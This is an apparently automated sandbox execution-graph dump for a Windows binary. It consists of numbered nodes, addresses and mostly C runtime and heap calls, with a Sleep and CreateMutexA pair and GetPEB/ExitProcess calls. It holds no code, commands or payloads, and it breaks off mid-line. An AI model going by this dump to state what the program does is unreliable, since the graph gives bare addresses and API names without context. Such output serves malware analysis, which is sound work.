                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                    Total number of Nodes:1846
                                                                                                                                                                    Total number of Limit Nodes:15
                                                                                                                                                                    execution_graph 9845 611c60 9846 6280c0 RtlAllocateHeap 9845->9846 9847 611c71 9846->9847 9850 62d64e 9847->9850 9853 62d621 9850->9853 9854 62d630 9853->9854 9855 62d637 9853->9855 9859 64988e 9854->9859 9862 6498fa 9855->9862 9858 611c7b 9860 6498fa RtlAllocateHeap 9859->9860 9861 6498a0 9860->9861 9861->9858 9865 649630 9862->9865 9864 64992b 9864->9858 9866 64963c __cftof 9865->9866 9869 64968b 9866->9869 9868 649657 9868->9864 9870 6496a7 9869->9870 9878 64971e __dosmaperr 9869->9878 9871 6496fe 9870->9871 9870->9878 9879 64edf6 9870->9879 9873 64edf6 RtlAllocateHeap 9871->9873 9871->9878 9875 649714 9873->9875 9874 6496f4 9876 64adf5 ___free_lconv_mon RtlAllocateHeap 9874->9876 9877 64adf5 ___free_lconv_mon RtlAllocateHeap 9875->9877 9876->9871 9877->9878 9878->9868 9880 64ee03 9879->9880 9881 64ee1e 9879->9881 9880->9881 9882 64ee0f 9880->9882 9883 64ee2d 9881->9883 9888 654fdc 9881->9888 9884 6475f6 __dosmaperr RtlAllocateHeap 9882->9884 9895 65500f 9883->9895 9887 64ee14 __cftof 9884->9887 9887->9874 9889 654fe7 9888->9889 9890 654ffc 9888->9890 9891 6475f6 __dosmaperr RtlAllocateHeap 9889->9891 9890->9883 9892 654fec 9891->9892 9893 646c5a __cftof RtlAllocateHeap 9892->9893 9894 654ff7 9893->9894 9894->9883 9896 655027 9895->9896 9897 65501c 9895->9897 9899 65502f 9896->9899 9903 655038 __dosmaperr 9896->9903 9904 64b04b 9897->9904 9900 64adf5 ___free_lconv_mon RtlAllocateHeap 9899->9900 9901 655024 9900->9901 9901->9887 9902 6475f6 __dosmaperr RtlAllocateHeap 9902->9901 9903->9901 9903->9902 9907 64b059 __dosmaperr 9904->9907 9905 6475f6 __dosmaperr RtlAllocateHeap 9906 64b087 9905->9906 9906->9901 9907->9905 9907->9906 9952 614276 9957 612410 9952->9957 9956 61428f 9958 612424 9957->9958 9972 62b52d 9958->9972 9961 613ce0 9962 613d42 9961->9962 9964 613d52 9961->9964 10075 627d50 9962->10075 9965 62d3e2 RtlAllocateHeap 9964->9965 9966 613d84 9965->9966 9967 627d50 RtlAllocateHeap 9966->9967 9969 613e03 9966->9969 9967->9969 9968 613e9b shared_ptr 9968->9956 9969->9968 9970 646c6a RtlAllocateHeap 9969->9970 9971 613ec1 9970->9971 9980 643aed 9972->9980 9974 61242a 9974->9961 9975 62b5a5 ___std_exception_copy 9987 62b1ad 9975->9987 9977 62b598 9983 62af56 9977->9983 9991 644f29 9980->9991 9984 62af9f ___std_exception_copy 9983->9984 9986 62afb2 shared_ptr 9984->9986 10051 62b39f 9984->10051 9986->9974 9988 62b1d8 9987->9988 9990 62b1e1 shared_ptr 9987->9990 9989 62b39f 5 API calls 9988->9989 9989->9990 9990->9974 9999 644f37 9991->9999 9993 62b555 9993->9974 9993->9975 9993->9977 9994 644f2e __cftof 9994->9993 9998 648bfc __cftof 9994->9998 10004 64d634 9994->10004 10025 6465ed 9998->10025 10000 644f40 9999->10000 10002 644f43 9999->10002 10000->9994 10001 644f77 10001->9994 10002->10001 10003 648ba3 ___std_exception_destroy RtlAllocateHeap 10002->10003 10003->10001 10005 64d640 __cftof 10004->10005 10006 64d667 __cftof 10005->10006 10007 64a7c8 __dosmaperr RtlAllocateHeap 10005->10007 10013 64d66d __cftof 10005->10013 10008 64d6b2 10006->10008 10010 64d69c 10006->10010 10006->10013 10007->10006 10009 6475f6 __dosmaperr RtlAllocateHeap 10008->10009 10011 64d6b7 10009->10011 10010->9998 10012 646c5a __cftof RtlAllocateHeap 10011->10012 10012->10010 10014 64d726 10013->10014 10015 64d81b __dosmaperr 10013->10015 10017 64d751 __cftof 10013->10017 10014->10017 10028 64d62b 10014->10028 10016 6465ed __cftof 3 API calls 10015->10016 10019 64d82e 10016->10019 10017->10010 10023 64d7a5 10017->10023 10031 64a671 10017->10031 10022 64d62b __cftof 4 API calls 10022->10017 10023->10010 10024 64a671 __cftof 4 API calls 10023->10024 10024->10010 10026 6464c7 __cftof 3 API calls 10025->10026 10027 6465fe 10026->10027 10029 64a671 __cftof 4 API calls 10028->10029 10030 64d630 10029->10030 10030->10022 10032 64a67b __dosmaperr 10031->10032 10033 64d82f __dosmaperr RtlAllocateHeap 10032->10033 10043 64a694 10032->10043 10034 64a6bc __dosmaperr 10033->10034 10037 64a6fc 10034->10037 10038 64a6c4 __dosmaperr 10034->10038 10035 64a722 10035->10023 10039 64a49f __dosmaperr RtlAllocateHeap 10037->10039 10040 64adf5 ___free_lconv_mon RtlAllocateHeap 10038->10040 10042 64a707 10039->10042 10040->10043 10044 64adf5 ___free_lconv_mon RtlAllocateHeap 10042->10044 10043->10035 10045 648bec 10043->10045 10044->10043 10046 648bf1 __cftof 10045->10046 10047 64d634 __cftof 4 API calls 10046->10047 10050 648bfc __cftof 10046->10050 10047->10050 10048 6465ed __cftof 3 API calls 10049 648c2f 10048->10049 10050->10048 10062 62bedf 10051->10062 10054 62b3e8 10054->9986 10071 62cc31 10062->10071 10065 646cbb 10066 646cc7 __cftof 10065->10066 10067 64a671 __cftof 4 API calls 10066->10067 10070 646ccc 10067->10070 10068 648bec __cftof 4 API calls 10069 646cf6 10068->10069 10070->10068 10072 62b3e1 10071->10072 10073 62cc3f InitOnceExecuteOnce 10071->10073 10072->10054 10072->10065 10073->10072 10076 627d62 10075->10076 10077 627dcb 10075->10077 10079 627d9c 10076->10079 10080 627d6d 10076->10080 10078 612480 RtlAllocateHeap 10077->10078 10081 627d7a 10078->10081 10083 627db9 10079->10083 10086 62d3e2 RtlAllocateHeap 10079->10086 10080->10077 10082 627d74 10080->10082 10084 646c6a RtlAllocateHeap 10081->10084 10088 627d83 10081->10088 10085 62d3e2 RtlAllocateHeap 10082->10085 10083->9964 10092 627dd5 10084->10092 10085->10081 10087 627da6 10086->10087 10087->9964 10088->9964 10089 627f20 10090 629270 RtlAllocateHeap 10089->10090 10103 627e91 __cftof 10090->10103 10091 627e01 10091->9964 10092->10089 10092->10091 10093 627f1b 10092->10093 10095 627e80 10092->10095 10096 627ea7 10092->10096 10097 612480 RtlAllocateHeap 10093->10097 10094 646c6a RtlAllocateHeap 10102 627f2a __cftof 10094->10102 10095->10093 10098 627e8b 10095->10098 10100 62d3e2 RtlAllocateHeap 10096->10100 10096->10103 10097->10089 10099 62d3e2 RtlAllocateHeap 10098->10099 10099->10103 10100->10103 10101 627f61 shared_ptr 10101->9964 10102->10101 10105 646c6a RtlAllocateHeap 10102->10105 10103->10094 10104 627f02 shared_ptr 10103->10104 10104->9964 10106 627f7c 10105->10106 10107 61a079 10108 61a081 shared_ptr 10107->10108 10109 61a930 10108->10109 10110 61a154 shared_ptr 10108->10110 10111 646c6a RtlAllocateHeap 10109->10111 10113 6280c0 RtlAllocateHeap 10110->10113 10112 61a953 Sleep CreateMutexA 10111->10112 10115 61a98e 10112->10115 10114 61a903 10113->10114 10116 61cc79 10117 61cc84 shared_ptr 10116->10117 10118 61ccda shared_ptr __floor_pentium4 10117->10118 10119 646c6a RtlAllocateHeap 10117->10119 10120 61ce36 10119->10120 10126 627a00 10120->10126 10122 61ce92 10140 615c10 10122->10140 10124 61ce9d 10191 61ca70 10124->10191 10127 627a26 10126->10127 10128 627a2d 10127->10128 10129 627a62 10127->10129 10130 627a81 10127->10130 10128->10122 10131 627ab9 10129->10131 10132 627a69 10129->10132 10134 62d3e2 RtlAllocateHeap 10130->10134 10138 627a76 __cftof 10130->10138 10135 612480 RtlAllocateHeap 10131->10135 10133 62d3e2 RtlAllocateHeap 10132->10133 10136 627a6f 10133->10136 10134->10138 10135->10136 10137 646c6a RtlAllocateHeap 10136->10137 10136->10138 10139 627ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 10137->10139 10138->10122 10139->10122 10211 615940 10140->10211 10142 615c54 10214 614b30 10142->10214 10145 615d17 shared_ptr __floor_pentium4 10145->10124 10146 646c6a RtlAllocateHeap 10147 615d47 __cftof 10146->10147 10147->10147 10148 6280c0 RtlAllocateHeap 10147->10148 10150 615e3e 10148->10150 10149 615ea6 shared_ptr __floor_pentium4 10149->10124 10150->10149 10151 646c6a RtlAllocateHeap 10150->10151 10152 615ed2 10151->10152 10153 615ffe shared_ptr __floor_pentium4 10152->10153 10154 646c6a RtlAllocateHeap 10152->10154 10153->10124 10155 61601b 10154->10155 10156 6280c0 RtlAllocateHeap 10155->10156 10157 616089 10156->10157 10158 6280c0 RtlAllocateHeap 10157->10158 10159 6160bd 10158->10159 10160 6280c0 RtlAllocateHeap 10159->10160 10161 6160ee 10160->10161 10162 6280c0 RtlAllocateHeap 10161->10162 10163 61611f 10162->10163 10164 6280c0 RtlAllocateHeap 10163->10164 10166 616150 10164->10166 10165 6165b1 shared_ptr __floor_pentium4 10165->10124 10166->10165 10167 646c6a RtlAllocateHeap 10166->10167 10168 6165dc 10167->10168 10169 627a00 RtlAllocateHeap 10168->10169 10170 6166a6 10169->10170 10171 615c10 4 API calls 10170->10171 10172 6166ac 10171->10172 10173 615c10 4 API calls 10172->10173 10174 6166b1 10173->10174 10221 6122c0 10174->10221 10176 6166c9 shared_ptr 10177 627a00 RtlAllocateHeap 10176->10177 10178 616732 10177->10178 10179 615c10 4 API calls 10178->10179 10180 61673d 10179->10180 10181 6122c0 4 API calls 10180->10181 10190 616757 shared_ptr 10181->10190 10182 616852 10183 6280c0 RtlAllocateHeap 10182->10183 10185 61689c 10183->10185 10184 627a00 RtlAllocateHeap 10184->10190 10186 6280c0 RtlAllocateHeap 10185->10186 10189 6168e3 shared_ptr __floor_pentium4 10186->10189 10187 615c10 4 API calls 10187->10190 10188 6122c0 4 API calls 10188->10190 10189->10124 10190->10182 10190->10184 10190->10187 10190->10188 10192 61cadd 10191->10192 10194 627a00 RtlAllocateHeap 10192->10194 10196 61cc87 10192->10196 10193 61ccda shared_ptr __floor_pentium4 10195 61ccee 10194->10195 10197 615c10 4 API calls 10195->10197 10196->10193 10198 646c6a RtlAllocateHeap 10196->10198 10199 61ccf9 10197->10199 10200 61ce36 10198->10200 10667 619030 10199->10667 10202 627a00 RtlAllocateHeap 10200->10202 10204 61ce92 10202->10204 10203 61cd0d 10680 628220 10203->10680 10206 615c10 4 API calls 10204->10206 10208 61ce9d 10206->10208 10207 61cd1f 10688 628f40 10207->10688 10209 61ca70 4 API calls 10208->10209 10224 627f80 10211->10224 10213 61596b 10213->10142 10215 614dc2 10214->10215 10219 614b92 10214->10219 10215->10145 10215->10146 10217 614ce5 10217->10215 10218 628ca0 RtlAllocateHeap 10217->10218 10218->10217 10219->10217 10239 646da6 10219->10239 10244 628ca0 10219->10244 10381 612280 10221->10381 10227 627fc7 10224->10227 10229 627f9e __cftof 10224->10229 10225 6280b3 10226 629270 RtlAllocateHeap 10225->10226 10228 6280b8 10226->10228 10227->10225 10230 62801b 10227->10230 10231 62803e 10227->10231 10232 612480 RtlAllocateHeap 10228->10232 10229->10213 10230->10228 10234 62d3e2 RtlAllocateHeap 10230->10234 10235 62d3e2 RtlAllocateHeap 10231->10235 10236 62802c __cftof 10231->10236 10233 6280bd 10232->10233 10234->10236 10235->10236 10237 646c6a RtlAllocateHeap 10236->10237 10238 628095 shared_ptr 10236->10238 10237->10225 10238->10213 10240 646db4 10239->10240 10241 646dc2 10239->10241 10259 646d19 10240->10259 10241->10219 10245 628cc3 10244->10245 10246 628dc9 10244->10246 10250 628d05 10245->10250 10251 628d2f 10245->10251 10247 629270 RtlAllocateHeap 10246->10247 10248 628dce 10247->10248 10249 612480 RtlAllocateHeap 10248->10249 10257 628d16 __cftof 10249->10257 10250->10248 10252 628d10 10250->10252 10253 62d3e2 RtlAllocateHeap 10251->10253 10251->10257 10255 62d3e2 RtlAllocateHeap 10252->10255 10253->10257 10254 646c6a RtlAllocateHeap 10256 628dd8 10254->10256 10255->10257 10257->10254 10258 628d8b shared_ptr __cftof 10257->10258 10258->10219 10264 64690a 10259->10264 10263 646d3d 10263->10219 10265 646921 10264->10265 10266 64692a 10264->10266 10272 646d52 10265->10272 10266->10265 10267 64a671 __cftof 4 API calls 10266->10267 10268 64694a 10267->10268 10278 64b5fb 10268->10278 10273 646d8f 10272->10273 10274 646d5f 10272->10274 10365 64b67d 10273->10365 10277 646d6e 10274->10277 10360 64b6a1 10274->10360 10277->10263 10279 646960 10278->10279 10280 64b60e 10278->10280 10282 64b628 10279->10282 10280->10279 10286 64f5ab 10280->10286 10283 64b63b 10282->10283 10285 64b650 10282->10285 10283->10285 10299 64e6b1 10283->10299 10285->10265 10287 64f5b7 __cftof 10286->10287 10288 64a671 __cftof 4 API calls 10287->10288 10290 64f5c0 __cftof 10288->10290 10289 64f606 10289->10279 10290->10289 10295 64f62c 10290->10295 10292 64f5ef __cftof 10292->10289 10293 648bec __cftof 4 API calls 10292->10293 10294 64f62b 10293->10294 10296 64f647 10295->10296 10297 64f63a __dosmaperr 10295->10297 10296->10292 10297->10296 10298 64f35f __dosmaperr RtlAllocateHeap 10297->10298 10298->10296 10300 64a671 __cftof 4 API calls 10299->10300 10301 64e6bb 10300->10301 10304 64e5c9 10301->10304 10303 64e6c1 10303->10285 10308 64e5d5 __cftof 10304->10308 10305 64e5f6 10305->10303 10306 64e5ef __cftof 10306->10305 10307 648bec __cftof 4 API calls 10306->10307 10309 64e668 10307->10309 10308->10306 10312 64adf5 ___free_lconv_mon RtlAllocateHeap 10308->10312 10310 64e6a4 10309->10310 10315 64a72e 10309->10315 10310->10303 10312->10306 10316 64a739 __dosmaperr 10315->10316 10317 64a745 10316->10317 10318 64d82f __dosmaperr RtlAllocateHeap 10316->10318 10319 648bec __cftof 4 API calls 10317->10319 10321 64a7be 10317->10321 10322 64a769 __dosmaperr 10318->10322 10320 64a7c7 10319->10320 10329 64e4b0 10321->10329 10323 64a7a5 10322->10323 10324 64a771 __dosmaperr 10322->10324 10326 64a49f __dosmaperr RtlAllocateHeap 10323->10326 10325 64adf5 ___free_lconv_mon RtlAllocateHeap 10324->10325 10325->10317 10327 64a7b0 10326->10327 10328 64adf5 ___free_lconv_mon RtlAllocateHeap 10327->10328 10328->10317 10330 64e5c9 __cftof 4 API calls 10329->10330 10331 64e4c3 10330->10331 10348 64e259 10331->10348 10334 64e4dc 10334->10310 10335 64b04b __cftof RtlAllocateHeap 10336 64e4ed 10335->10336 10337 64e51f 10336->10337 10351 64e6c4 10336->10351 10340 64adf5 ___free_lconv_mon RtlAllocateHeap 10337->10340 10339 64e512 10342 64e51a 10339->10342 10345 64e535 __cftof 10339->10345 10341 64e52d 10340->10341 10341->10310 10343 6475f6 __dosmaperr RtlAllocateHeap 10342->10343 10343->10337 10344 64e561 10344->10337 10356 64e14b 10344->10356 10345->10344 10346 64adf5 ___free_lconv_mon RtlAllocateHeap 10345->10346 10346->10344 10349 64690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10348->10349 10350 64e26b 10349->10350 10350->10334 10350->10335 10352 64e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10351->10352 10353 64e6e4 __cftof 10352->10353 10354 64e75a __cftof __floor_pentium4 10353->10354 10355 64e32f __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10353->10355 10354->10339 10355->10354 10357 64e157 __cftof 10356->10357 10358 64e198 __cftof RtlAllocateHeap 10357->10358 10359 64e16e __cftof 10358->10359 10359->10337 10361 64690a __cftof 4 API calls 10360->10361 10362 64b6be 10361->10362 10364 64b6ce __floor_pentium4 10362->10364 10370 64f1bf 10362->10370 10364->10277 10366 64a671 __cftof 4 API calls 10365->10366 10367 64b688 10366->10367 10368 64b5fb __cftof 4 API calls 10367->10368 10369 64b698 10368->10369 10369->10277 10371 64690a __cftof 4 API calls 10370->10371 10372 64f1df __cftof 10371->10372 10373 64b04b __cftof RtlAllocateHeap 10372->10373 10374 64f29d __floor_pentium4 10372->10374 10376 64f232 __cftof 10372->10376 10373->10376 10374->10364 10377 64f2c2 10376->10377 10378 64f2df 10377->10378 10379 64f2ce 10377->10379 10378->10374 10379->10378 10380 64adf5 ___free_lconv_mon RtlAllocateHeap 10379->10380 10380->10378 10382 612296 10381->10382 10385 6487f8 10382->10385 10388 647609 10385->10388 10387 6122a4 10387->10176 10389 647631 10388->10389 10390 647649 10388->10390 10392 6475f6 __dosmaperr RtlAllocateHeap 10389->10392 10390->10389 10391 647651 10390->10391 10393 64690a __cftof 4 API calls 10391->10393 10394 647636 10392->10394 10396 647661 10393->10396 10395 646c5a __cftof RtlAllocateHeap 10394->10395 10397 647641 __floor_pentium4 10395->10397 10401 647bc4 10396->10401 10397->10387 10417 64868d 10401->10417 10403 6476e8 10414 647a19 10403->10414 10404 647be4 10405 6475f6 __dosmaperr RtlAllocateHeap 10404->10405 10406 647be9 10405->10406 10407 646c5a __cftof RtlAllocateHeap 10406->10407 10407->10403 10408 647bd5 10408->10403 10408->10404 10424 647d15 10408->10424 10432 648168 10408->10432 10437 647dc2 10408->10437 10442 647de8 10408->10442 10471 647f36 10408->10471 10415 64adf5 ___free_lconv_mon RtlAllocateHeap 10414->10415 10416 647a29 10415->10416 10416->10397 10418 6486a5 10417->10418 10419 648692 10417->10419 10418->10408 10420 6475f6 __dosmaperr RtlAllocateHeap 10419->10420 10421 648697 10420->10421 10422 646c5a __cftof RtlAllocateHeap 10421->10422 10423 6486a2 10422->10423 10423->10408 10493 647d34 10424->10493 10426 647d1a 10427 647d31 10426->10427 10428 6475f6 __dosmaperr RtlAllocateHeap 10426->10428 10427->10408 10429 647d23 10428->10429 10430 646c5a __cftof RtlAllocateHeap 10429->10430 10431 647d2e 10430->10431 10431->10408 10433 648171 10432->10433 10434 648178 10432->10434 10502 647b50 10433->10502 10434->10408 10438 647dd2 10437->10438 10439 647dcb 10437->10439 10438->10408 10440 647b50 4 API calls 10439->10440 10441 647dd1 10440->10441 10441->10408 10443 647def 10442->10443 10444 647e09 10442->10444 10447 647fbb 10443->10447 10448 647f4f 10443->10448 10459 647e39 10443->10459 10445 6475f6 __dosmaperr RtlAllocateHeap 10444->10445 10444->10459 10446 647e25 10445->10446 10449 646c5a __cftof RtlAllocateHeap 10446->10449 10450 648001 10447->10450 10451 647fc2 10447->10451 10460 647f92 10447->10460 10456 647f5b 10448->10456 10448->10460 10453 647e30 10449->10453 10561 648604 10450->10561 10454 647fc7 10451->10454 10455 647f69 10451->10455 10453->10408 10454->10460 10462 647fcc 10454->10462 10468 647f77 10455->10468 10470 647f8b 10455->10470 10555 648241 10455->10555 10456->10455 10461 647fa2 10456->10461 10456->10468 10459->10408 10460->10468 10460->10470 10546 648420 10460->10546 10461->10470 10532 648390 10461->10532 10463 647fd1 10462->10463 10464 647fdf 10462->10464 10463->10470 10536 6485e5 10463->10536 10540 648571 10464->10540 10468->10470 10564 6486ea 10468->10564 10470->10408 10472 647f4f 10471->10472 10473 647fbb 10471->10473 10479 647f5b 10472->10479 10483 647f92 10472->10483 10474 648001 10473->10474 10475 647fc2 10473->10475 10473->10483 10478 648604 RtlAllocateHeap 10474->10478 10476 647fc7 10475->10476 10477 647f69 10475->10477 10482 647fcc 10476->10482 10476->10483 10481 648241 4 API calls 10477->10481 10490 647f77 10477->10490 10492 647f8b 10477->10492 10478->10490 10479->10477 10484 647fa2 10479->10484 10479->10490 10480 648420 RtlAllocateHeap 10480->10490 10481->10490 10485 647fd1 10482->10485 10486 647fdf 10482->10486 10483->10480 10483->10490 10483->10492 10488 648390 4 API calls 10484->10488 10484->10492 10489 6485e5 RtlAllocateHeap 10485->10489 10485->10492 10487 648571 RtlAllocateHeap 10486->10487 10487->10490 10488->10490 10489->10490 10491 6486ea 4 API calls 10490->10491 10490->10492 10491->10492 10492->10408 10496 647d5e 10493->10496 10495 647d40 10495->10426 10497 647d80 10496->10497 10498 647db7 10497->10498 10499 6475f6 __dosmaperr RtlAllocateHeap 10497->10499 10498->10495 10500 647dac 10499->10500 10501 646c5a __cftof RtlAllocateHeap 10500->10501 10501->10498 10503 647b62 10502->10503 10506 647b67 10502->10506 10504 6475f6 __dosmaperr RtlAllocateHeap 10503->10504 10504->10506 10510 648ab6 10506->10510 10508 6475f6 __dosmaperr RtlAllocateHeap 10509 647b99 10508->10509 10509->10408 10511 648ad1 10510->10511 10514 648868 10511->10514 10515 64868d RtlAllocateHeap 10514->10515 10519 64887a 10515->10519 10516 6488b3 10517 64690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10516->10517 10524 6488bf 10517->10524 10518 64888f 10520 6475f6 __dosmaperr RtlAllocateHeap 10518->10520 10519->10516 10519->10518 10531 647b85 10519->10531 10521 648894 10520->10521 10523 646c5a __cftof RtlAllocateHeap 10521->10523 10522 646d52 GetPEB ExitProcess GetPEB RtlAllocateHeap 10522->10524 10523->10531 10524->10522 10525 6488ee 10524->10525 10527 648a8d RtlAllocateHeap 10525->10527 10528 648958 10525->10528 10526 648a8d RtlAllocateHeap 10529 648a20 10526->10529 10527->10528 10528->10526 10530 6475f6 __dosmaperr RtlAllocateHeap 10529->10530 10529->10531 10530->10531 10531->10508 10531->10509 10534 6483ab 10532->10534 10533 6483dd 10533->10468 10534->10533 10568 64c88e 10534->10568 10537 6485f1 10536->10537 10538 648420 RtlAllocateHeap 10537->10538 10539 648603 10538->10539 10539->10468 10541 648586 10540->10541 10542 6475f6 __dosmaperr RtlAllocateHeap 10541->10542 10545 64859a 10541->10545 10543 64858f 10542->10543 10544 646c5a __cftof RtlAllocateHeap 10543->10544 10544->10545 10545->10468 10548 648433 10546->10548 10547 648465 10554 64845e 10547->10554 10592 64779f 10547->10592 10548->10547 10549 64844e 10548->10549 10550 6475f6 __dosmaperr RtlAllocateHeap 10549->10550 10551 648453 10550->10551 10552 646c5a __cftof RtlAllocateHeap 10551->10552 10552->10554 10554->10468 10556 64825a 10555->10556 10557 64779f RtlAllocateHeap 10556->10557 10558 648297 10557->10558 10605 64d3c8 10558->10605 10560 64830d 10560->10468 10560->10560 10562 648420 RtlAllocateHeap 10561->10562 10563 64861b 10562->10563 10563->10468 10565 64875d __floor_pentium4 10564->10565 10566 648707 10564->10566 10565->10470 10566->10565 10567 64c88e __cftof 4 API calls 10566->10567 10567->10566 10571 64c733 10568->10571 10572 64c743 10571->10572 10573 64c781 10572->10573 10574 64c76d 10572->10574 10583 64c748 10572->10583 10576 64690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10573->10576 10575 6475f6 __dosmaperr RtlAllocateHeap 10574->10575 10577 64c772 10575->10577 10578 64c78c 10576->10578 10580 646c5a __cftof RtlAllocateHeap 10577->10580 10579 64c79c 10578->10579 10584 64c7c8 __cftof 10578->10584 10581 652b7d __cftof RtlAllocateHeap 10579->10581 10580->10583 10582 64c7b1 10581->10582 10582->10583 10586 6475f6 __dosmaperr RtlAllocateHeap 10582->10586 10583->10533 10588 64c7de __cftof 10584->10588 10591 64c815 __cftof 10584->10591 10585 6475f6 __dosmaperr RtlAllocateHeap 10585->10583 10586->10583 10587 6475f6 __dosmaperr RtlAllocateHeap 10589 64c87f 10587->10589 10588->10583 10588->10585 10590 646c5a __cftof RtlAllocateHeap 10589->10590 10590->10583 10591->10583 10591->10587 10593 6477b4 10592->10593 10594 6477c3 10592->10594 10595 6475f6 __dosmaperr RtlAllocateHeap 10593->10595 10596 6477b9 10594->10596 10597 64b04b __cftof RtlAllocateHeap 10594->10597 10595->10596 10596->10554 10598 6477ea 10597->10598 10601 647801 10598->10601 10602 647a33 10598->10602 10600 64adf5 ___free_lconv_mon RtlAllocateHeap 10600->10596 10601->10600 10603 64adf5 ___free_lconv_mon RtlAllocateHeap 10602->10603 10604 647a42 10603->10604 10604->10601 10606 64d3ee 10605->10606 10607 64d3d8 10605->10607 10606->10607 10612 64d400 10606->10612 10608 6475f6 __dosmaperr RtlAllocateHeap 10607->10608 10609 64d3dd 10608->10609 10610 646c5a __cftof RtlAllocateHeap 10609->10610 10611 64d3e7 10610->10611 10611->10560 10614 64d467 10612->10614 10615 64d439 10612->10615 10613 64d485 10618 64d4e4 10613->10618 10619 64d4ae 10613->10619 10614->10613 10616 64d48a 10614->10616 10626 64d2ff 10615->10626 10631 64cbdf 10616->10631 10659 64cef8 10618->10659 10621 64d4b3 10619->10621 10622 64d4cc 10619->10622 10642 64d23e 10621->10642 10652 64d0e2 10622->10652 10627 64d315 10626->10627 10628 64d320 10626->10628 10627->10611 10629 64a1f1 ___std_exception_copy RtlAllocateHeap 10628->10629 10630 64d37b __cftof 10629->10630 10630->10611 10632 64cbf1 10631->10632 10633 64690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10632->10633 10634 64cc05 10633->10634 10635 64cc21 10634->10635 10636 64cc0d 10634->10636 10638 64cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 10635->10638 10641 64cc1c __alldvrm __cftof _strrchr 10635->10641 10637 6475f6 __dosmaperr RtlAllocateHeap 10636->10637 10639 64cc12 10637->10639 10638->10641 10640 646c5a __cftof RtlAllocateHeap 10639->10640 10640->10641 10641->10611 10643 6531a8 RtlAllocateHeap 10642->10643 10644 64d26c 10643->10644 10645 652c47 RtlAllocateHeap 10644->10645 10646 64d29e 10645->10646 10647 64d2de 10646->10647 10648 64d2b7 10646->10648 10650 64d2a5 10646->10650 10649 64cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10647->10649 10651 64d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10648->10651 10649->10650 10650->10611 10651->10650 10653 6531a8 RtlAllocateHeap 10652->10653 10654 64d10f 10653->10654 10655 652c47 RtlAllocateHeap 10654->10655 10656 64d147 10655->10656 10657 64d14e 10656->10657 10658 64d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 10656->10658 10657->10611 10658->10657 10660 64cf10 10659->10660 10661 6531a8 RtlAllocateHeap 10660->10661 10662 64cf29 10661->10662 10663 652c47 RtlAllocateHeap 10662->10663 10665 64cf6e 10663->10665 10664 64cf75 10664->10611 10665->10664 10666 64cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 10665->10666 10666->10664 10668 619080 10667->10668 10669 627a00 RtlAllocateHeap 10668->10669 10670 61908f 10669->10670 10671 615c10 4 API calls 10670->10671 10672 61909a 10671->10672 10673 6280c0 RtlAllocateHeap 10672->10673 10674 6190ec 10673->10674 10675 628220 RtlAllocateHeap 10674->10675 10677 6190fe shared_ptr 10675->10677 10676 61917e shared_ptr __floor_pentium4 10676->10203 10677->10676 10678 646c6a RtlAllocateHeap 10677->10678 10679 6191aa 10678->10679 10681 628292 10680->10681 10682 628248 10680->10682 10686 6282a1 10681->10686 10687 628f40 RtlAllocateHeap 10681->10687 10682->10681 10683 628251 10682->10683 10709 629280 10683->10709 10685 62825a 10685->10207 10686->10207 10687->10686 10689 628f6b 10688->10689 10690 62908e 10688->10690 10694 628fb2 10689->10694 10695 628fdc 10689->10695 10691 629270 RtlAllocateHeap 10690->10691 10692 629093 10691->10692 10693 612480 RtlAllocateHeap 10692->10693 10701 628fc3 __cftof 10693->10701 10694->10692 10696 628fbd 10694->10696 10697 62d3e2 RtlAllocateHeap 10695->10697 10695->10701 10699 62d3e2 RtlAllocateHeap 10696->10699 10697->10701 10698 646c6a RtlAllocateHeap 10700 62909d 10698->10700 10699->10701 10702 612480 std::_Throw_future_error 10700->10702 10703 6290b8 10700->10703 10705 6290be 10700->10705 10701->10698 10706 62904c shared_ptr __cftof 10701->10706 10707 6438af ___std_exception_copy RtlAllocateHeap 10702->10707 10704 62d3e2 RtlAllocateHeap 10703->10704 10704->10705 10705->10196 10706->10196 10708 6124c3 10707->10708 10708->10196 10710 629294 10709->10710 10713 6292a5 __cftof 10710->10713 10714 6294e0 10710->10714 10712 62932b 10712->10685 10713->10685 10715 62950b 10714->10715 10716 629619 10714->10716 10720 629552 10715->10720 10722 629579 10715->10722 10717 629270 RtlAllocateHeap 10716->10717 10718 62961e 10717->10718 10719 612480 RtlAllocateHeap 10718->10719 10728 629563 __cftof 10719->10728 10720->10718 10721 62955d 10720->10721 10724 62d3e2 RtlAllocateHeap 10721->10724 10725 62d3e2 RtlAllocateHeap 10722->10725 10722->10728 10723 646c6a RtlAllocateHeap 10726 629628 shared_ptr 10723->10726 10724->10728 10725->10728 10726->10712 10727 6295e1 shared_ptr __cftof 10727->10712 10728->10723 10728->10727 10729 646a44 10730 646a52 10729->10730 10731 646a5c 10729->10731 10742 64b655 10730->10742 10747 64698d 10731->10747 10734 646a59 10735 646a76 10750 6468ed 10735->10750 10738 646a8a 10740 646aa8 10738->10740 10741 64adf5 ___free_lconv_mon RtlAllocateHeap 10738->10741 10739 64b655 RtlAllocateHeap 10739->10738 10741->10740 10743 64b662 10742->10743 10744 64b679 10743->10744 10753 6475c0 10743->10753 10744->10734 10748 64690a __cftof 4 API calls 10747->10748 10749 64699f 10748->10749 10749->10735 10761 64683b 10750->10761 10758 6475e3 10753->10758 10755 6475cb __dosmaperr 10756 6475f6 __dosmaperr RtlAllocateHeap 10755->10756 10757 6475de 10756->10757 10757->10734 10759 64a7c8 __dosmaperr RtlAllocateHeap 10758->10759 10760 6475e8 10759->10760 10760->10755 10762 646863 10761->10762 10763 646849 10761->10763 10765 646889 __cftof 10762->10765 10766 64686a 10762->10766 10774 6469cc 10763->10774 10768 64689f __cftof 10765->10768 10769 6469e6 RtlAllocateHeap 10765->10769 10772 646853 10766->10772 10778 6469e6 10766->10778 10770 6475c0 __dosmaperr RtlAllocateHeap 10768->10770 10768->10772 10769->10768 10771 6468ab 